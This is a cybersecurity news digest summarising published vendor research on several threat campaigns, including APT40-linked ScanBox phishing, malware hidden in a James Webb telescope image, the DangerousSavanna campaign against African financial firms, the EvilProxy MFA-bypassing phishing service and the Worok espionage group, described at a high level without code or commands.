At a glance.
- Espionage surrounding the South China Sea.
- Steganography used to hide malware in the James Webb telescope image.
- Financially motivated campaign targets African countries.
- Phishing-as-a-service offering on the dark web bypasses MFA.
- Worok cyberespionage group active in Central Asia and the Middle East.
Espionage surrounding the South China Sea.
Researchers at Proofpoint and PWC have published a report on a Chinese espionage campaign that's targeting Australian government and media organizations, as well as "global heavy industry manufacturers which conduct maintenance of fleets of wind turbines in the South China Sea." Proofpoint tracks the actor as "Red Ladon," and notes that it has overlaps with the threat actor tracked publicly as APT40 and Leviathan:
"Beginning on 12 April 2022, and continuing through mid-June 2022, Proofpoint identified several waves of a phishing campaign resulting in the execution of the ScanBox reconnaissance framework, in part based on intelligence shared by PwC Threat Intelligence related to ongoing ScanBox activity. The phishing campaign involved URLs delivered in phishing emails, which redirected victims to a malicious website posing as an Australian news media outlet. The website’s landing page delivered a JavaScript ScanBox malware payload to selected targets. In historic instances, ScanBox has been delivered from websites that were the victim of strategic web compromise (SWC) attacks with legitimate sites being injected with malicious JavaScript code. In this instance, the threat actor controls the malicious site and delivers malicious code to unsuspecting users."
Steganography used to hide malware in the James Webb telescope image.
Researchers at Securonix warn that a threat actor is distributing malware using the recent deep field image of the universe from the James Webb telescope. The attackers are using phishing emails to send Microsoft Office attachments with malicious macros. When a user opens the attachment and enables macros, a command will download the JPG image file. It then uses certutil.exe to decode the image file into a malicious executable. The researchers conclude, "Using a legitimate image to build a Golang binary with Certutil is not very common in our experience or typical and something we are tracking closely. It’s clear that the original author of the binary designed the payload with both some trivial counter-forensics and anti-EDR detection methodologies in mind."
Financially motivated campaign targets African countries.
Check Point describes "DangerousSavanna," a financially motivated campaign that's been targeting "multiple major financial service groups in French-speaking Africa for the last two years." The campaign has targeted organizations in Ivory Coast, Morocco, Cameroon, Senegal, and Togo. The threat actor uses spearphishing emails to distribute malware:
"The infection starts with spear-phishing emails written in French, usually sent to several employees of the targeted companies, all of which are medium to large financial groups in French-speaking Africa. In the early stages of the campaign, the phishing emails were sent using Gmail and Hotmail services. To increase their credibility, the actors began to use lookalike domains, impersonating other financial institutions in Africa such as the Tunisian Foreign bank, Nedbank, and others. For the last year, the actors also used spoofed email addresses of a local insurance advisory company whose domain doesn’t have an SPF record."
Phishing-as-a-service offering on the dark web bypasses MFA.
Yesterday researchers at security firm Resecurity reported an interesting discovery in the criminal-to-criminal market. They’ve found a new C2C offering, called either EvilProxy or Moloch (and we note in passing that the hoods are growing increasingly direct and literal in the the way they name their wares) that sells phishing-as-a-service. EvilProxy is interesting in that it shows some ability to bypass multi-factor authentication. It’s a commodity service but an advanced one. As Resecurity observes, “the productized underground service like EvilProxy enables threat actors to attack users with enabled MFA on the largest scale without the need to hack upstream services.” That is, it represents a more direct mode of attack than the recent Twilio compromise did.
It also represents an advance in criminal capability. Reverse proxy and cookie injection attacks have been seen before as ways of evading multi-factor authentication, but hitherto it had been state-directed intelligence services who’d been observed using these techniques. The methods are now being made available to criminals.
Worok cyberespionage group active in Central Asia and the Middle East.
Security firm ESET has released research into a threat group it's calling "Worok." They characterize it as sophisticated, and while "sophisticated" is thrown around a lot, in this case ESET uses it with some justice. "Worok is a cyberespionage group that develops its own tools, as well as leveraging existing tools, to compromise its targets." The motive is espionage. "Stealing information from their victims is what we believe the operators are after because they focus on high-profile entities in Asia and Africa, targeting various sectors, both private and public, but with a specific emphasis on government entities." It's unclear whom Worok is working for, despite some circumstantial overlap with other groups, some of them associated with Beijing. "Activity times and toolset indicate possible ties with TA428, but we make this assessment with low confidence. Their custom toolset includes two loaders – one in C++ and one in C# .NET – and one PowerShell backdoor." And ESET invites contributions from other researchers. "While our visibility is limited, we hope that shedding light on this group will encourage other researchers to share information about this group."